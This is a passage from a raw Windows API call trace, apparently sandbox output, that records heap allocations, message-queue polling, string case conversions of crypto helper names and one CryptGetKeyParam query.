(HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0032.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca48 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0032.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0032.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0032.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0032.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1482c) returned 0x8a47e8 [0032.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0032.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0032.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0032.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0032.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0032.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0032.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0032.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0032.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0032.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0032.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0032.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0032.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.181] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0032.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da278 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0032.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0032.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc70 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0032.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.182] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0032.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0032.182] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0032.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0032.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0032.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0032.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0032.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0032.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0032.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0032.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0032.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0032.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0032.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0032.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.183] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0032.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0032.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0032.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0032.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0032.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0032.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0032.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0032.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0032.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0032.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0032.184] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0032.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0032.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0032.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0032.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0032.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.184] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0032.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb68 [0032.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0032.184] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0032.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0032.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0032.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0032.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0032.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0032.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0032.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0032.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0032.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0032.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0032.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0032.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0032.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0032.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0032.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0032.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0032.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0032.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0032.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0032.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0032.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0032.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0032.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0032.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0032.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0032.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0032.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0032.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0032.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0032.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0032.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0032.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0032.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0032.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0032.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0032.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0032.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0032.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0032.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0032.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0032.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0032.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0032.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0032.187] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0032.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0032.187] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da3a8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3a8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0032.187] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.188] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.188] 